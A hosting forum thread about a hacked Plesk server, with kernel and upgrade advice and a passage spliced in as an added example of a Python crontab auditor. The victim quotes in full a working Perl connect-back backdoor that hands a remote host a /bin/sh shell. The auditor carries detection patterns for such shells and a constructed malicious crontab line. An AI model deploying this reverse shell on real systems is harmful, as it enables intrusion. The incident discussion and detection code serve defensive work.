Server hacked - unable to log case at Support panel [SOLVED]
-
- Long Time Forum Regular
- Posts: 2813
- Joined: Sat Aug 20, 2005 9:30 am
- Location: The Netherlands
Can you find a kernel version in Plesk (e.g. something like "Operating system: Linux 2.6.9-78.0.5.EL")? Or can you run "uname -a" via SSH?
I don't know if Plesk 8.3 has any known security vulnerabilities, but Plesk 8.6 is the current version.
Lemonbit Internet Dedicated Server Management
-
- Long Time Forum Regular
- Posts: 2813
- Joined: Sat Aug 20, 2005 9:30 am
- Location: The Netherlands
biggles wrote: uname -a: 2.6.9-023stab046.2-enterprise
The current 'super stable' RHEL4-based OpenVZ kernel is 2.6.9-023stab048.4. I have no idea how old 2.6.9-023stab046.2 is. I believe uname -a also gives you a build date?
biggles wrote: OT: Is it safe to upgrade to 8.6 now? I am a little bit worried since the debacle with 8.4...
What debacle? We updated all our machines to 8.4 and then 8.6. No problems whatsoever.
Lemonbit Internet Dedicated Server Management
uname -s: 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 i686 i386 GNU/Linux
Debacle: A lot of people had trouble with e-mail and finally SWsoft released an update. http://kb.parallels.com/en/5256
-
- Long Time Forum Regular
- Posts: 2813
- Joined: Sat Aug 20, 2005 9:30 am
- Location: The Netherlands
biggles wrote: uname -s: 2.6.9-023stab046.2-enterprise #1 SMP Mon Dec 10 15:22:33 MSK 2007 i686 i686 i386 GNU/Linux
Well, that is an older kernel. I don't know if it contains any known local root exploits though. I track security vulnerabilities in the packages we use closely, but we're not running Virtuozzo, so I don't know about those Virtuozzo/OpenVZ kernels.
biggles wrote: Debacle: A lot of people had trouble with e-mail and finally SWsoft released an update. http://kb.parallels.com/en/5256
Oh, that. I never thought allowing the use of short mail account names was a smart idea, so this issue didn't affect us.
Lemonbit Internet Dedicated Server Management
A small update. The attackers got in again last night (European time). This time I caught them in the act and was able to secure logs etc. They had also installed some programs, among others "zap", "zmuie", some flood kit, part of IlloGiC RooTKiT v1.0, etc. They seemed to be running some tainted crond version. Support has been granted access to my server. Hopefully they will find out how they got in.
Not much news. Scott had trouble logging in today. Hopefully he can do another attempt later. They broke into the server again today. They are executing this script via crontab:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
printf "Usage: $0 [Host] <Port>\n";
exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
$port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
open(STDIN,">&SERVER");
open(STDOUT,">&SERVER");
open(STDERR,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
exit(0);
}
print "[*] Datached\n\n";
If anyone has any input on how to stop this, I am all ears...
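As an added example, not part of this thread and not the poster's or Parallels' code: a small Python audit that flags crontab entries of the kind described above (scripts run from world-writable or hidden directories, inline interpreter one-liners, literal IP arguments) and checks a script body for the connect-back indicators visible in the quoted Perl script. The crontab lines it runs on are constructed; the script fragments are taken from the quoted script and used only as detection fixtures. The indicator list is an assumption drawn from that one script, not a complete signature set.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample crontab (not from the thread). Line 4 imitates an entry
# that runs a dropped script from a hidden directory under /var/tmp.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/find /var/log -name '*.gz' -mtime +30 -delete
*/10 * * * * /usr/local/bin/backup-db.sh >/dev/null 2>&1
*/5 * * * * /var/tmp/.x/cb.pl 203.0.113.10 80 >/dev/null 2>&1
@reboot perl -e 'print 1' >/dev/null 2>&1
"""

# Fragments of the script quoted in the post, kept as a detection fixture only.
SAMPLE_SCRIPT = r"""
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
open(STDIN,">&SERVER");
exec {'/bin/sh'} '-bash' . "\0" x 4;
"""

SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
HIDDEN_PATH = re.compile(r"/\.[^/\s]+")            # a path component starting with "."
INLINE_INTERP = re.compile(r"\b(perl|python|ruby|sh|bash)\b\s+-[ec]\b")
LITERAL_IP = re.compile(r"\b\d{1,3}(\.\d{1,3}){3}\b")

# Indicators of a connect-back shell (assumed from the quoted script).
SCRIPT_INDICATORS = {
    "dup_to_socket": re.compile(r'open\s*\(\s*STD(IN|OUT|ERR)\s*,\s*">&'),
    "exec_shell": re.compile(r"exec\s*\{?\s*['\"]/bin/(ba)?sh['\"]"),
    "raw_socket": re.compile(r"\bsocket\s*\(.*SOCK_STREAM"),
    "connect_back_banner": re.compile(r"Connect\s*Back\s*Backdoor", re.I),
}


@dataclass
class Finding:
    line_no: int
    command: str
    reasons: List[str]


def parse_crontab(text):
    """Yield (line_no, schedule, command) for each active crontab line."""
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                   # @reboot, @daily, ...
            sched, _, cmd = line.partition(" ")
        else:
            parts = line.split(None, 5)            # five time fields + command
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        yield n, sched, cmd


def audit_crontab(text):
    """Return a Finding for every crontab entry that trips at least one rule."""
    findings = []
    for n, _sched, cmd in parse_crontab(text):
        reasons = []
        if any(d in cmd for d in SUSPICIOUS_DIRS):
            reasons.append("runs from a world-writable directory")
        if HIDDEN_PATH.search(cmd):
            reasons.append("references a hidden path")
        if INLINE_INTERP.search(cmd):
            reasons.append("inline interpreter one-liner")
        if LITERAL_IP.search(cmd):
            reasons.append("literal IP address argument")
        if reasons:
            findings.append(Finding(n, cmd, reasons))
    return findings


def scan_script(text):
    """Return the sorted names of connect-back indicators found in a script body."""
    return sorted(name for name, rx in SCRIPT_INDICATORS.items() if rx.search(text))


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"crontab line {f.line_no}: {f.command}")
        for r in f.reasons:
            print(f"    - {r}")
    print("script indicators:", scan_script(SAMPLE_SCRIPT))
```

On a real box, feed it the system crontab, the files under the cron.d directory and each user's spool crontab; a trojaned crond (as the poster suspects) can hide entries from the running daemon, so read the files from a rescue boot or compare them against a known-good install rather than trusting the live system, and treat any hit as a reason to rebuild rather than as the full extent of the compromise.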
-
- Forum Regular
- Posts: 661
- Joined: Mon Oct 29, 2007 6:51 pm
We can deliver quality hosting from the Netherlands! You can mail me at info @ ber-art.nl. Our servers are maintained by Lemonbit (alias breun).
Last edited by BerArt on Wed Nov 12, 2008 5:23 am, edited 1 time in total.
Yes, you can't go wrong with breun/Lemonbit.
I've "known" them for a very long time from these forums and you will never get bad advice from them. Same goes for BerArt!
Faris.
--------------------------------
<advert>
If you want to rent a UK-based VPS that comes with friendly advice and support from a fellow ART fan, please get in touch.
</advert>